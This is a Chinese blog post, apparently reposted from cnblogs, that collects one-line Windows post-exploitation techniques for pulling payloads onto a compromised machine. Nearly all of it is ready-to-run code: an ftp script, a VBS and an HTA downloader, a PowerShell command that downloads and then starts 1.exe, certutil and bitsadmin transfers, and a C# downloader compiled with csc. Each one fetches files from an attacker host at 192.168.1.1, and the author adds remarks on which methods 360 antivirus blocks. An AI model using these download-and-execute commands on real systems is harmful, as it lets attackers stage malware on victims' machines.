一句话下载总结(用于后渗透上传payload)

zoukankan html css js c++ java

一句话下载总结(用于后渗透上传payload)
利用ftp来下载payload文件
```
echo open 192.168.1.1 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET 1.exe >> ftp.txt
ftp -s:ftp.txt
```
后记:这个我没有实验成功太菜了

利用vbs来下载payload
```
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:	est1.exe",2
```
后记:这个已经利用成功了，网上说可以用script来执行，可能win10上面没有，但是可以直接双击运行，或者命令行里面直接使用,vbs脚本后缀为vbs

利用Powershell来下载payload
```
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:	est1.exe');start-process 'C:	est1.exe'
```
后记:是在命令行中执行以上命令

利用certutil下载文件

直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看缓存certutil.exe -urlcache *
至于这个缓存有什么用就不知道了
后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存)，360会拦截

利用CSC(windows的c#编译器)来下载文件

1.cs文件内容
```
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.1.1/1.exe";
            string receivePath = @"C:	est";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}
```
后记:csc.exe位于C:WindowsMicrosoft.NETFrameworkv2.0.50727。因为未加入环境变量中所以需要指定路径。
使用方式：C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /out:C: es tdownload.exe C: est1.cs
这样1.cs就会被编辑为exe文件，我们运行一下就会把文件下载下来了，360会进行拦截，估计是捕获了下载的时候的流量了，因为并不是直接就拦截了

hta下载文件

将下列代码保存至.hta文件
```
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.1.1/1.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\test\1.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>
```
后记：直接双击运行既可或者命令行直接执行，360会拦截

利用bitsadmin下载文件

bitsadmin是一个控制台工具，可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

bitsadmin /transfer n http://192.168.1.1/1.exe C: estupdate1.exe
后记:不支持https/ftp协议，php/python自带的服务器会报错,360会拦截

总结，其实感觉Windows上可以玩的东西比Linux多，使用的也比Linux多，这可能也是红蓝对抗偏向于这边的原因吧
查看全文

相关阅读:
风险分解结构
 WBS 工作分解结构
 react函数式组件（非路由组件）实现路由跳转
 react使用antd组件递归实现左侧菜单导航树
 React4.0以上如何获取当前的路由地址呢
 浅谈react传入路由参数---withRouter组件
 react项目实现维持登录与自动登录
 async和await应用步骤分析+优化异常处理
 跨域场景&&跨域处理方案
 vscode react中标签自动补全 vscode jsx语法自动补全html标签

原文地址：https://www.cnblogs.com/Mikasa-Ackerman/p/yi-ju-hua-xia-zai-zong-jie-yong-yu-hou-shen-tou-sh.html

一句话下载总结(用于后渗透上传payload)

利用ftp来下载payload文件

利用vbs来下载payload

利用Powershell来下载payload

利用certutil下载文件

利用CSC(windows的c#编译器)来下载文件

hta下载文件

利用bitsadmin下载文件

总结，其实感觉Windows上可以玩的东西比Linux多，使用的也比Linux多，这可能也是红蓝对抗偏向于这边的原因吧